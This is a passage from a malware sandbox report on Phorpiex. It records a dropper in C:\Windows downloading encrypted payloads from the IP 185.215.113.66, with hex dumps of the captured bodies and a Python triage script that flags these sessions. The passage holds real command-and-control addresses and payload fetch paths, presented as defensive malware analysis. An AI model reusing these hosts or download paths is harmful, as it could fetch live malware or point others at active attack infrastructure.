                                                                                                                                                        Oct 26, 2024 07:26:31.911556959 CEST1236INData Raw: 0c 17 99 f2 dc 4c 43 4c 1b 74 a4 2e 3b 7f 13 7b 31 10 68 ce 33 5d c9 ef c7 81 17 80 74 c1 fc 96 e6 99 a0 cf 08 de f9 ef c7 af b3 99 89 2e b0 c0 b8 e1 91 45 69 65 c0 5c 3f 1f 96 c7 05 7c c3 36 20 3a d9 99 20 a3 04 33 c0 2b cd 06 60 f3 53 fd 82 9c
                                                                                                                                                        Data Ascii: LCLt.;{1h3]t.Eie\?|6 : 3+`Se0L#}tK1(*ss|@a$@bWEgU4LlLAq5;z#@M8id8[y7*pZN$S<[Z88Al5r6^9Cko+
                                                                                                                                                        Oct 26, 2024 07:26:31.911569118 CEST1236INData Raw: 2c c0 09 b2 53 27 5c 5f 4b 92 e5 70 d1 58 a1 7e 68 f0 f8 2d 01 0b ae f2 ef 1d fd 76 3e 43 44 79 12 e8 03 d8 c6 49 d5 28 b9 14 42 6b 25 e2 aa ea b4 fb 50 1e bd 72 08 e3 be 09 fc 52 71 27 3f 1a 20 cd ab 85 b8 04 a4 b9 8a 0a 97 92 1d 0a c1 e5 9f d3
                                                                                                                                                        Data Ascii: ,S'\_KpX~h-v>CDyI(Bk%PrRq'? OZ,0+F_p4$8ce5\JA|MZz,J-ZoUS-,T`i?`xqc[)2~pHTV 6RCju.,jA
                                                                                                                                                        Oct 26, 2024 07:26:31.911587954 CEST1236INData Raw: 70 7b bc f5 b5 3b dc 79 f2 61 41 e6 ae 67 58 ff 70 b0 e5 cb 23 20 e0 db 7f fa 3f 12 a7 b3 ab 9c b1 b0 7d d7 30 5f e3 1f 4c 49 ba 61 d9 ff c5 7b 13 b3 67 32 03 8a 4d b2 4c 32 29 a2 9b ae 38 f4 33 e5 76 c7 16 e4 5a e9 e9 58 3b 0d be 8c 7f fb 2a 4d
                                                                                                                                                        Data Ascii: p{;yaAgXp# ?}0_LIa{g2ML2)83vZX;*M#>}df(gz;OE\wd(afrc@(Q0BJ*G2^{3k{$?imUMrbd<58qqH!]C'L l~FseDp?X7
                                                                                                                                                        Oct 26, 2024 07:26:31.911601067 CEST548INData Raw: 63 34 fc c6 c6 48 5c d3 fa cd e0 9b f9 6c 0b 41 9e aa 09 76 cf 23 4e 60 27 cb f4 36 5a 5c 53 c7 11 93 42 4a 91 a7 00 c1 21 72 e2 97 f5 56 32 30 53 7b 88 7d cf 72 eb 02 1a 4c 1e ad 0a 8e 64 a4 61 ef cc e7 c7 64 2b 30 12 68 bd 09 18 7f e5 a2 82 1f
                                                                                                                                                        Data Ascii: c4H\lAv#N`'6Z\SBJ!rV20S{}rLdad+0hFaGv:;]ud8[H9PCE=YdC//7Mo:_[nU4&-+T3U,%S!&C+?0p[}f*5&hj5[@B
                                                                                                                                                        Oct 26, 2024 07:26:31.911608934 CEST1236INData Raw: c5 ff 56 13 f0 5c 33 a0 fa f0 c9 91 56 2a da 57 b1 a0 5d 31 60 98 d3 80 b8 e2 b1 91 0e f9 69 77 b0 36 6d 2a b7 40 06 cd 49 fc 0a 65 10 10 22 09 6f 15 d8 e2 dd b0 55 6c ef 2a 23 5e f3 72 aa 97 53 5a ca 74 a9 6b 83 92 91 2e 5b b8 de 95 44 f7 17 ea
                                                                                                                                                        Data Ascii: V\3V*W]1`iw6m*@Ie"oUl*#^rSZtk.[D`i!A&\NtYJ@xi}S6s@%e i$+'JccC{d,;HGj("IMHM;"C*@=
                                                                                                                                                        Oct 26, 2024 07:26:31.911621094 CEST1236INData Raw: d2 bd 6a 4f b3 f3 04 fd dc 8f 4f 96 d4 d9 78 d6 71 22 12 a0 26 ee 4c 98 92 fa 8b f7 60 62 d2 48 5b 9c 20 f3 ab a1 00 23 51 da cb 45 93 a3 0b c0 aa 32 dc 5d 20 9b af 53 0c de 0c 96 80 4e 52 82 a5 e3 34 73 ce 83 78 32 e8 77 f0 e5 9c fd 79 ba 01 1c
                                                                                                                                                        Data Ascii: jOOxq"&L`bH[ #QE2] SNR4sx2wyHqDFA/ga:{X>O!{\o9P-\ g(y1EGK9/pvAyNbgZF'%V[X$x7Z'Owa5hhyX&1
                                                                                                                                                        Oct 26, 2024 07:26:31.911633015 CEST1236INData Raw: a5 35 46 00 1b d9 e1 f8 95 8e ef 7b 6b d8 19 b5 11 e3 cf 43 42 f3 d5 ce 94 74 d1 d3 7c c4 63 16 3f ed 3b 70 02 93 a7 7e cd b0 b8 dd ec 38 97 ef e3 7f e0 95 e6 c2 d1 10 46 bd 45 ad 21 31 a1 0f 83 2a 92 bc eb 76 df f7 99 a5 73 af bf 37 86 2e a1 30
                                                                                                                                                        Data Ascii: 5F{kCBt|c?;p~8FE!1*vs7.0du=rFWu&uLD,6|< b&zhH}bt^%/m=ES/noaYQ*j% b/',P@zB%7O]N0}YZ2:H%>%i)uE
                                                                                                                                                        Oct 26, 2024 07:26:31.917013884 CEST1236INData Raw: 01 1d ec 02 cf 5f 90 a1 5a 7d ac f5 02 1f 61 f6 2e 95 3a d9 d7 45 bd b2 a5 43 1a 63 62 a4 ef 8d 50 b8 c6 19 72 5c 1b 7d 7a fc 10 39 54 eb 7d 2e f3 27 93 8f 41 ce dd eb 1c f9 bf bf 80 40 26 db 1c 7a 0b 7b 03 ca d6 4d 91 b1 54 fe 99 c7 a6 47 66 9f
                                                                                                                                                        Data Ascii: _Z}a.:ECcbPr\}z9T}.'A@&z{MTGfCyi&)sR0WjC0h3;_L';/HnL +<@$5y}:*kzM#mLUbqu8h;! u=voy.Y=;"v5!=VS


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.5  49784        185.215.113.66  80                7488  C:\Windows\sysppvrdnvs.exe

Timestamp | Bytes transferred | Direction | Data
Oct 26, 2024 07:26:32.925695896 CEST | 166 | OUT | GET /1 HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                        Host: 185.215.113.66
Oct 26, 2024 07:26:33.827378988 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Sat, 26 Oct 2024 05:26:33 GMT
                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                        Content-Length: 110600
                                                                                                                                                        Last-Modified: Wed, 25 Sep 2024 06:10:18 GMT
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        ETag: "66f3a94a-1b008"
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Data Raw: 4e 47 53 21 00 02 00 00 02 38 79 12 a8 9a 87 6a 07 b8 bb 78 39 22 7b 5b 26 ab 0b 54 4c be 08 2c 0a 8d 4c c0 6e 44 be d8 37 30 4c 6e a5 cc 8b 4d 50 c1 42 a2 d2 65 ba a4 81 27 94 4c 70 56 4a a8 a2 db 67 f9 0c f5 59 c6 b2 c1 1f 8d 5d ac c3 89 ec 68 3d 86 ef fd bc 4f 74 28 e6 50 3a c2 d3 07 6a 6a 6f 46 93 04 e6 15 ed 32 79 1c 90 b2 fd 3a d3 50 40 82 62 8a ae c7 36 5d 75 bd eb d1 44 5c de f6 69 34 3c d2 0d d5 09 51 3f 8a ab d7 f4 f8 b8 08 5f 3b 5d fc f8 21 e5 8e 41 10 34 b5 41 17 01 ea 08 9c 89 31 0a ed 63 f0 73 61 5e 9c 2b 64 51 21 78 6c fb 36 51 ff f4 38 77 85 e5 03 61 37 3f e6 e7 5d 83 54 25 3a 1b d7 d8 85 48 d7 31 b5 b0 aa 09 24 0f 6a bf de 08 ac b0 8b 83 34 66 b3 6b 21 83 92 7f 70 f8 46 7a d3 76 9e 08 8b 91 ef 0f 01 96 12 82 3f 6c 18 f9 80 35 dd a9 85 c7 37 09 bc 2e 28 13 d8 dd c0 99 3d 63 89 73 04 0d 63 08 46 cd 7b f2 d1 2d c6 75 45 b7 38 d9 44 1a f4 db 85 9f 51 46 02 09 c3 7c ba 38 8a 65 79 13 33 27 a7 40 3c 4b 71 9e fc 22 53 f7 2d 93 90 3f fd b9 34 a0 73 cc df b8 7f 2e 91 a7 53 85 ba 32 d7 bf fe [TRUNCATED]
                                                                                                                                                        Data Ascii: NGS!8yjx9"{[&TL,LnD70LnMPBe'LpVJgY]h=Ot(P:jjoF2y:P@b6]uD\i4<Q?_;]!A4A1csa^+dQ!xl6Q8wa7?]T%:H1$j4fk!pFzv?l57.(=cscF{-uE8DQF|8ey3'@<Kq"S-?4s.S2j=eLeYh+[}AM,@gW\Z)ET/|"bWRoj(|A,>?1;>"&;ucy[t`w #cdyysGx_Ch*I]Dey.:FQQC BZn2@X&>UYgDYZ)F!FFeh4VGK>V3#+$,&S.lkIF\Ck$)J_l\",0u!kT}V!YB{}nAL[Xo[+1\m,^bLMDj-g <_8d+-D/k<'dv-Qi`N4W(_"%5q844o4gdxsifcD^]M(A[gB4mwAV@g54]BLr!n*WG,6+uY9U4OP&?vKi>X7Dto=2f
                                                                                                                                                        Oct 26, 2024 07:26:33.827410936 CEST1236INData Raw: b4 bd ad 62 69 93 e7 43 cf 35 4e 07 3e c2 37 6c 66 f1 c1 c8 10 ff ff ef 5e e4 1e 40 46 f2 4f 47 bb b9 53 b2 17 fe 91 80 48 a4 a5 9e 88 5e b0 09 b2 f7 1a 05 c1 ae 77 a6 1a 01 ba f2 27 90 fd 83 00 22 7e ab d7 16 d7 69 b8 9a d6 11 59 f5 10 ed 6f d3
                                                                                                                                                        Data Ascii: biC5N>7lf^@FOGSH^w'"~iYoT:1<~!HhQ:P^(K3: yXM^gQD55!HF?}'+Wxrp8U_HK\UxQ)|Rai>&y+eu B
                                                                                                                                                        Oct 26, 2024 07:26:33.827430964 CEST1236INData Raw: 92 02 a6 af d3 8a 44 33 dc 7e c6 0b 87 b7 17 5b 32 9e d8 e3 7e 89 ae fe 0d ce 3b 86 4f 41 86 56 53 cf 5c d1 6d b9 e7 ab 2b 74 96 68 fa 98 de de 1d 87 40 33 cd 44 42 72 de c3 3e 36 e6 f9 aa 06 79 c6 c8 0c 64 26 c0 a8 10 55 43 92 4b 87 97 c4 af 18
                                                                                                                                                        Data Ascii: D3~[2~;OAVS\m+th@3DBr>6yd&UCK$D8$O#5LCLt.;{1h3]t.Eie\?|6 : 3+`Se0L#}tK1(*ss|@a$@bWEgU4
                                                                                                                                                        Oct 26, 2024 07:26:33.827442884 CEST1236INData Raw: c9 90 52 78 37 15 55 e7 3b 12 de 97 ad 09 08 34 9c f1 3e 5e eb 2a 63 8c 43 75 c5 71 82 c9 58 2a a4 3e cc f8 12 f3 7a b1 87 1d c5 f2 2b 58 69 da b0 8d c8 23 05 88 f5 df cf 88 ba 49 a6 1f bc 70 47 57 59 26 4d 98 3e 2e a6 8d 60 89 13 9e 54 9b 34 50
                                                                                                                                                        Data Ascii: Rx7U;4>^*cCuqX*>z+Xi#IpGWY&M>.`T4PXsK,UG]-7%h,S'\_KpX~h-v>CDyI(Bk%PrRq'? OZ,0+F_p4$8ce5\JA|
                                                                                                                                                        Oct 26, 2024 07:26:33.827462912 CEST448INData Raw: 2d 5d 5d 9a a2 19 58 54 3f 1c 22 27 fe cc 6c ae 32 01 57 29 8c 43 bd f9 12 3a 50 2a 41 97 76 a7 d8 52 38 48 d8 e9 cd 74 59 bb d4 bf b6 10 02 29 f9 f4 15 10 c3 73 2a 5e da 1f b6 fe f8 51 3f f6 9f 7b 5a 9f 07 62 9c 14 01 e1 93 84 e8 4e b5 e0 0e b3
                                                                                                                                                        Data Ascii: -]]XT?"'l2W)C:P*AvR8HtY)s*^Q?{ZbNg!WOxD%f~vp{;yaAgXp# ?}0_LIa{g2ML2)83vZX;*M#>}df(gz;OE\wd(afrc@(Q
                                                                                                                                                        Oct 26, 2024 07:26:33.827477932 CEST1236INData Raw: 9a 3d 1a cb 65 63 99 e9 ec 2a ec 6a 74 27 b6 34 e7 e0 38 9c 1f bd 84 c7 dd 5d 7e e8 48 a4 d8 f8 44 7b 6e a3 ed a1 ad 86 a6 86 56 bb 53 ac a1 28 d7 bd 27 4d a3 8f fc 96 cd 1b 45 18 db 7b b1 2c 9c 60 20 ba 19 27 f9 33 04 09 cf 97 a0 29 74 a8 c0 b0
                                                                                                                                                        Data Ascii: =ec*jt'48]~HD{nVS('ME{,` '3)t#Av@:VtVBD8^e`,idHd8H0"_]>4]23BIZ?[LxIX~$"dT~4PDKy\MI8kgy$"?
                                                                                                                                                        Oct 26, 2024 07:26:33.827490091 CEST1236INData Raw: d7 7a 67 28 d6 c6 01 2c 3d 2d 4c 98 3c d5 c2 bb 7a 20 67 e8 b5 c8 62 12 bb 0d be 5d 6b 63 d5 b8 d9 cf 76 b6 d5 53 0e c0 5d f2 84 03 26 79 78 c2 d4 60 35 9c 49 80 8e d5 5d c1 e3 7c 99 ec aa e5 5c ae dd a7 55 39 f2 15 94 88 7c 03 9b 18 96 55 32 7d
                                                                                                                                                        Data Ascii: zg(,=-L<z gb]kcvS]&yx`5I]|\U9|U2}!#m<R122do*z:=J-VmM[':50oNn_:Os}^~sH.Idu#}HRz"EnyT/*V\3V*W]1`i
                                                                                                                                                        Oct 26, 2024 07:26:33.827513933 CEST1236INData Raw: 14 cd 56 60 47 0b 9a 54 1a 8c ee bf a8 31 cd bb 22 dc be 9b 16 2f b5 03 00 e1 8f b6 86 97 ba d9 a6 60 2f 5a 56 98 9b c4 8e 78 0c e0 4f f2 ab 29 c8 b6 f6 ec e4 57 74 e1 42 50 81 af e8 17 0e 76 2f e1 87 0e 48 6b 26 1f e1 01 98 2f e2 e7 27 92 a1 60
                                                                                                                                                        Data Ascii: V`GT1"/`/ZVxO)WtBPv/Hk&/'`gM<Zs3UB`>-XY)#4&~[Yzhvy,@xWY>/ !P(I,SkM79q(4jOOxq"&L`b
                                                                                                                                                        Oct 26, 2024 07:26:33.827524900 CEST1236INData Raw: 08 a2 77 8f 51 fe 79 8c 2b 20 db ad dc ab 47 03 4f 76 3f 46 71 02 01 c3 1c bc 6f be 47 0c 45 ea dd ea 60 97 60 cc 82 45 0f 07 0c 78 08 1b c3 24 99 05 80 de 3b 7b 1d 13 c7 90 25 8a 6d 97 fc 00 e3 ed 14 df c9 51 c9 91 05 8c 6a 05 46 4b b4 f7 83 01
                                                                                                                                                        Data Ascii: wQy+ GOv?FqoGE``Ex$;{%mQjFKky.OaXm%725!!-lZrRC~'pCU\AeJ1$ncSVqq-sqFr6{+:lka5F{kCBt|c
                                                                                                                                                        Oct 26, 2024 07:26:33.827538013 CEST448INData Raw: a3 e7 0f a0 a6 f0 72 ae 25 a0 37 be c6 0a 30 26 fe d3 63 de c6 05 e7 ac bd f4 a9 1c ee 13 24 39 8e ca ad 2d c8 09 fc d1 d4 27 94 fc a4 8f 37 1f 97 0d 50 0d 25 4c 55 50 3e aa 76 f2 63 b5 be 2f 8d 31 19 8c 3f 45 44 3e 98 37 82 be 32 14 a7 65 11 ea
                                                                                                                                                        Data Ascii: r%70&c$9-'7P%LUP>vc/1?ED>72e+-s<cpAU_. {w2#Uf(eq=(jq(PZqBpDEQ}m6ZgPGSoty}3_Z}a.:ECcb
                                                                                                                                                        Oct 26, 2024 07:26:33.832870007 CEST1236INData Raw: 3d ea 56 08 b8 ef 53 61 0d 1f 5d 2b 7f 33 16 8e 38 8e 34 bb 28 13 f4 8f c0 71 68 6b f4 63 25 63 92 07 2d e0 e6 37 fa 70 30 e3 b4 00 51 cb 2e 37 b8 23 41 8d e8 05 91 e7 fa 39 b4 3c 55 a2 0e 88 33 ee 4e 57 d6 07 d8 98 34 cc 3a af b7 30 8d ce e7 54
                                                                                                                                                        Data Ascii: =VSa]+384(qhkc%c-7p0Q.7#A9<U3NW4:0T]Gl_Ht&:UP}u|C_/S0'n!C??&ol@ &d'C(!S"EYDXW`IN6Z-C%"Zt1#=D&5 R


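As an added triage example (not part of the Joe Sandbox report and not Phorpiex's own code), the following Python encodes the HTTP sessions shown on this page as records and applies the checks an analyst would run over them: a Host header that is a bare IP, a numeric payload path (/1, /2), an application/octet-stream body that does not begin with the MZ PE magic (the /1 download begins with the bytes 4e 47 53 21, "NGS!", and /2 with 24 ca 67 ed), a download performed by an executable living directly in C:\Windows, and more than one hard-coded User-Agent string in one report (Chrome/93 to twizt.net, Chrome/128 to 185.215.113.66). The session records are constructed from the headers visible on this page; the process and PID of the /peinstall.php session sit outside this excerpt and are left empty. Everything else (function names, the finding strings) is this example's own.

```python
"""Triage checks over HTTP sessions like the ones recorded in this report.

Added example, not part of the Joe Sandbox report. SESSIONS below is
constructed from the request/response headers shown on the page; body
prefixes are the first bytes of each captured response.
"""
from __future__ import annotations

import ipaddress
import re
from dataclasses import dataclass


@dataclass
class HttpSession:
    session_id: int
    process: str          # requesting process as reported by the sandbox ("" if not in excerpt)
    pid: int | None       # None where the excerpt does not show it
    dst_ip: str
    dst_port: int
    request: str          # request line + headers, newline separated
    response: str         # status line + headers, newline separated
    body_prefix: bytes    # first bytes of the response body


def _header(block: str, name: str) -> str | None:
    """Case-insensitive lookup of one header value in a raw header block."""
    m = re.search(rf"^{re.escape(name)}:\s*(.*)$", block, re.IGNORECASE | re.MULTILINE)
    return m.group(1).strip() if m else None


def _is_bare_ip(host: str) -> bool:
    try:
        ipaddress.ip_address(host.split(":")[0])
        return True
    except ValueError:
        return False


def triage_session(s: HttpSession) -> list[str]:
    """Return indicator strings for one session; an empty list means nothing notable."""
    findings: list[str] = []
    method, path, _version = s.request.splitlines()[0].split(" ", 2)
    host = _header(s.request, "Host") or ""
    ctype = (_header(s.response, "Content-Type") or "").lower()

    if _is_bare_ip(host):
        findings.append(f"host is a bare IP ({host}) rather than a domain")
    if re.fullmatch(r"/\d+", path):
        findings.append(f"numeric payload path {path}")
    if ctype.startswith("application/octet-stream") and s.body_prefix[:2] != b"MZ":
        # A binary download that is not a plain PE: packed, encrypted or a custom container.
        findings.append(f"octet-stream body does not start with MZ: {s.body_prefix[:4]!r}")
    proc = s.process.lower()
    if proc.startswith("c:\\windows\\") and not proc.startswith("c:\\windows\\system32\\"):
        findings.append(f"download performed by {s.process} (executable directly under C:\\Windows)")
    return findings


def distinct_user_agents(sessions: list[HttpSession]) -> list[str]:
    """Distinct User-Agent strings seen; more than one from one sample is itself a tell."""
    return sorted({_header(s.request, "User-Agent") or "" for s in sessions})


UA93 = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
        "(KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36")
UA128 = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
         "(KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36")
OCTET = "HTTP/1.1 200 OK\nServer: nginx/1.18.0 (Ubuntu)\nContent-Type: application/octet-stream"
DROPPER = "C:\\Windows\\sysppvrdnvs.exe"

# Constructed from the headers on this page (session 1's process/PID are outside the excerpt).
SESSIONS = [
    HttpSession(1, "", None, "", 80,
                f"GET /peinstall.php HTTP/1.1\nUser-Agent: {UA93}\nHost: twizt.net",
                "HTTP/1.1 200 OK\nServer: nginx/1.18.0 (Ubuntu)\n"
                "Content-Type: text/html; charset=UTF-8\nTransfer-Encoding: chunked",
                b"0\r\n\r\n"),
    HttpSession(2, DROPPER, 7488, "185.215.113.66", 80,
                f"GET /1 HTTP/1.1\nUser-Agent: {UA128}\nHost: 185.215.113.66",
                OCTET + "\nContent-Length: 110600", b"NGS!\x00\x02\x00\x00"),
    HttpSession(3, DROPPER, 7488, "185.215.113.66", 80,
                f"GET /1 HTTP/1.1\nUser-Agent: {UA128}\nHost: 185.215.113.66",
                OCTET + "\nContent-Length: 110600", b"NGS!\x00\x02\x00\x00"),
    HttpSession(4, DROPPER, 7488, "185.215.113.66", 80,
                f"GET /2 HTTP/1.1\nUser-Agent: {UA128}\nHost: 185.215.113.66",
                OCTET + "\nContent-Length: 8960", b"\x24\xca\x67\xed"),
]


def triage_report(sessions: list[HttpSession]) -> dict[int, list[str]]:
    """Map session id -> findings, skipping sessions with nothing to report."""
    return {s.session_id: f for s in sessions if (f := triage_session(s))}


if __name__ == "__main__":
    for sid, findings in triage_report(SESSIONS).items():
        print(f"session {sid}:")
        for f in findings:
            print("  -", f)
    print("user agents seen:", len(distinct_user_agents(SESSIONS)))
```

The /peinstall.php check-in produces no finding on its own: it goes to a domain, returns text/html and an empty chunked body. The payload fetches are what stand out, and each of the four checks fires on them independently, so a rule built from any one of them would still catch the sessions above even if the operators changed the others.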
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.5  49812        185.215.113.66  80                7488  C:\Windows\sysppvrdnvs.exe

Timestamp | Bytes transferred | Direction | Data
Oct 26, 2024 07:26:38.551296949 CEST | 166 | OUT | GET /2 HTTP/1.1
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                        Host: 185.215.113.66
Oct 26, 2024 07:26:39.456511021 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Sat, 26 Oct 2024 05:26:39 GMT
                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                        Content-Length: 8960
                                                                                                                                                        Last-Modified: Fri, 18 Oct 2024 09:57:02 GMT
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        ETag: "671230ee-2300"
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Data Raw: 24 ca 67 ed 72 35 5d b1 46 f1 4d 5b 99 be 6f 06 49 cd 95 a1 a2 11 e9 12 d3 c7 e2 35 85 45 62 e3 98 c2 b5 e8 b3 c3 bf 4c 36 2c 95 69 25 c7 6b 5a 0e 12 d1 d0 d9 38 1e 82 f6 e8 65 50 49 7c 94 06 0f 9b 93 3c f5 9e 69 71 94 f4 be ed 23 e0 11 fd 01 bb d6 0f 4f 40 35 bd 1b 55 7c 2a 7b 60 29 b2 bc d2 5d 82 48 ae a6 d6 e5 8d b7 02 e1 04 86 78 c0 95 2d 88 ea 8d be 64 52 7e 41 f0 7d 22 32 c1 9b e2 e3 14 80 83 e5 cb 20 2b 9c 28 aa 2a ce 52 d2 6d ab 02 db b7 dc 64 f9 a7 cf 21 e1 c6 28 b0 93 0a 24 b9 ec 35 1a 74 e4 b2 b9 a3 cc 46 d5 5d c9 bc 99 ad 3c ab 67 22 d8 c7 97 f2 56 04 28 31 7d 8c 5d 43 1a 88 ae 8d 05 a9 18 e4 b6 73 33 0c 16 37 36 f3 e3 88 97 26 e4 9a b3 ae 0b 49 63 11 8c bf 25 74 ec e5 68 fd 49 ed 80 62 bd f3 a4 fe e9 d1 52 28 e2 bc d0 e5 01 15 9e 7d b8 da 49 45 ae fd 1b 3c fc a8 8a 03 da 5d 9c c4 a1 43 c5 12 ab c3 c4 39 c0 a4 db f5 78 69 7c 06 e7 0e 81 91 f3 84 d2 da f5 d6 2f d6 12 f8 e0 09 3e 79 9d 8a 34 6d e0 ad 0b 33 f0 e1 68 4f 83 05 9c da a4 1f 3b 02 c3 e0 a4 3c 85 7c ab 99 35 b0 2c af 30 dd 74 41 [TRUNCATED]
                                                                                                                                                        Data Ascii: $gr5]FM[oI5EbL6,i%kZ8ePI|<iq#O@5U|*{`)]Hx-dR~A}"2 +(*Rmd!($5tF]<g"V(1}]Cs376&Ic%thIbR(}IE<]C9xi|/>y4m3hO;<|5,0tA`JNn;wesqT_:<fb7JH3& f1FGc&k,Jx+c`ws~(sFIT,5\)}-@.4>aue\v=IkB[Q2cLAlTrOUY*mj#uUP>Y{,Tk3h,v)PTK3_++mNP[qeG9f|[-&M~&14w_la/okwM_w^7Rgg%Tv}.Tp;dSuzFPHZIpz50g.`lK\V3tryl2R]?czmvo\ 0oN3aPV=BE\ _^hVf\*n$0qC7BQn.}c/Yd=G-TSx&zwi:,aoouHn8ZxF^=RnUTD9'
                                                                                                                                                        Oct 26, 2024 07:26:39.456531048 CEST1236INData Raw: 93 57 98 e3 4c ac 64 50 69 d5 5e 60 5a 42 6a 17 d0 32 d7 d9 a3 9b b5 09 7a 01 5c d5 9a f5 b4 51 04 76 c6 6d 7e 0d de 69 d1 63 ff bd c2 b8 2c 86 13 5e 38 49 df c1 51 01 c0 d9 12 0c ba 3d d0 82 60 7b 3d ce 3a 38 e6 8c dc 07 d6 cd 79 a1 7c 5e 57 03
                                                                                                                                                        Data Ascii: WLdPi^`ZBj2z\Qvm~ic,^8IQ=`{=:8y|^WaO".m).=WP~TELBc*$7Rl-tjORq)X.Ji5@46n=yIb%InGlSz33(:&eGco%bA;0=X^
                                                                                                                                                        Oct 26, 2024 07:26:39.456542969 CEST1236INData Raw: 25 31 0a 68 9c d8 ba 48 4c 90 81 b7 28 74 68 c8 16 f9 b8 2a c6 90 b0 6c 31 39 f2 bf 87 64 53 3a 32 36 df 01 fc e5 9e 18 72 19 69 e2 c7 ef 65 32 01 84 09 84 3b 94 85 f3 13 25 da 52 6f 20 19 c5 d9 dd d1 da 08 6e 35 b4 1e 41 c3 9d d9 91 9f 3f 3a 82
                                                                                                                                                        Data Ascii: %1hHL(th*l19dS:26rie2;%Ro n5A?:p"~ B'P?:/B1%yN[u::vukl/G^uh3vjZ0C,%Q 5my8e'+o{D82.p/{hp'SS/g)W
                                                                                                                                                        Oct 26, 2024 07:26:39.456554890 CEST336INData Raw: f3 0c 7b d7 90 9d 53 08 50 35 7a 7f 49 0b 16 9f ae a3 19 6a 1b 05 aa 5c 54 c6 1f 37 73 99 af 43 61 76 51 11 f2 eb 89 90 be 6d c9 bd 48 20 04 57 6d a3 8a 18 2a 96 64 13 63 ca 0d 0f 2d 28 7f 61 ff eb 80 38 1c 6f fd f6 59 64 de 2b f7 3d 76 66 94 76
                                                                                                                                                        Data Ascii: {SP5zIj\T7sCavQmH Wm*dc-(a8oYd+=vfvB"1C,/m#u?n8CpT}v#0]{&T;I]#zYw8OA{kK&GFMXFJ+I$?r-:Pw_gN/6p"]c{1 N
                                                                                                                                                        Oct 26, 2024 07:26:39.456567049 CEST1236INData Raw: 35 91 9b c1 14 4c d0 91 fe aa bd 52 c5 29 72 9d e3 bc 39 de cd a5 b4 b1 58 e9 96 a3 2b 25 d0 11 07 be f8 ed 89 71 be 79 12 82 18 46 ac a6 88 ba 3d 5a 96 af 3f a5 ef 1f e9 da 21 18 33 69 f5 e3 08 b7 9c 52 4d 92 10 87 70 e8 6c 0e e9 14 c4 c1 93 a8
                                                                                                                                                        Data Ascii: 5LR)r9X+%qyF=Z?!3iRMpl/BrlB7-*Yt;|rS{.gdfow%f.tBH{:Ba{%dPL(Q6V>m:p@Nx!I EKJ*{s`#U
                                                                                                                                                        Oct 26, 2024 07:26:39.456604004 CEST1236INData Raw: 33 10 82 8d 90 54 9e bb 7c c3 87 86 d3 12 55 e8 4a 8a 16 82 0c 91 2e b8 d1 1d bb bf dc e7 4c f3 af 8e cf 43 b8 f9 77 31 77 35 65 64 c5 bb ba 51 07 10 a4 ce 44 d9 db b7 71 e2 b5 48 ee fa 05 91 3d 1b c9 c6 91 2e ff f0 a9 7e 6f 84 73 ba 58 6f e7 75
                                                                                                                                                        Data Ascii: 3T|UJ.LCw1w5edQDqH=.~osXouHePdtnq`Y6G4@4G"EL*-D$hOYCMt;Eby;tQfqV{#btFGqNPs%#@#&AG =OPp*uLx!$A
                                                                                                                                                        Oct 26, 2024 07:26:39.456624031 CEST1236INData Raw: 6c 81 82 15 e3 70 20 82 3e e5 10 11 69 9b c5 78 03 32 55 28 01 11 d9 5b bf 7c 8f f7 52 e2 75 fa 3e a7 e6 71 c7 16 06 88 4f a6 d0 e2 07 16 8f d1 6f 4f ed 61 fd 2f f4 a0 9c 03 da 7f 60 b3 09 01 fb 75 30 18 7f f9 60 5d c4 9a c2 7e 36 ce f1 82 6c 67
                                                                                                                                                        Data Ascii: lp >ix2U([|Ru>qOoOa/`u0`]~6lgMhwROak:%xN;Y]DiIYj`i@gnK= {}7NWSC"$Z^"Ld($]8,C"e0+Y_%}a\w_ra=
                                                                                                                                                        Oct 26, 2024 07:26:39.456646919 CEST1236INData Raw: f6 56 30 b3 3a 65 04 c3 55 fa b5 49 01 cb 37 ea ec 22 5b 30 9a 0a 04 9c d2 c4 90 d9 af 3e 7c f2 da fa a0 c6 ac 89 75 c0 db 08 0e 2b ba 62 f1 ce af 70 b2 74 97 c8 9b 68 6e 8f 03 71 69 8e 1c 2f 8e 04 97 ed f1 66 d1 b6 b2 d3 72 b6 80 88 41 93 d1 4c
                                                                                                                                                        Data Ascii: V0:eUI7"[0>|u+bpthnqi/frALB?mWAE05E/z6Q[O7P2"[d&mM9TL|yL"6E0,)=UPr4;2JaQ{f8-{=i,JHy +9Oq
                                                                                                                                                        Oct 26, 2024 07:26:39.456670046 CEST236INData Raw: 85 bc 8a fa dc af 0d e0 30 c3 1e cc 98 59 60 14 22 c4 07 30 d0 57 99 c1 35 8a 41 79 f6 05 db 6a e2 36 97 56 92 29 2e 94 19 14 8b 7c 45 4e 62 61 1d 90 74 32 02 27 06 29 3b 90 dc 43 c3 f8 61 11 5d c0 07 39 3a d8 39 a0 16 43 27 2f df 3b bf 2f 40 51
                                                                                                                                                        Data Ascii: 0Y`"0W5Ayj6V).|ENbat2');Ca]9:9C'/;/@QF6aa(KJ[ZgUP\+Lzx!0hH$;9`6\(<V67E9/:j;>|Wk<cb4Gcap`%SmttII@i


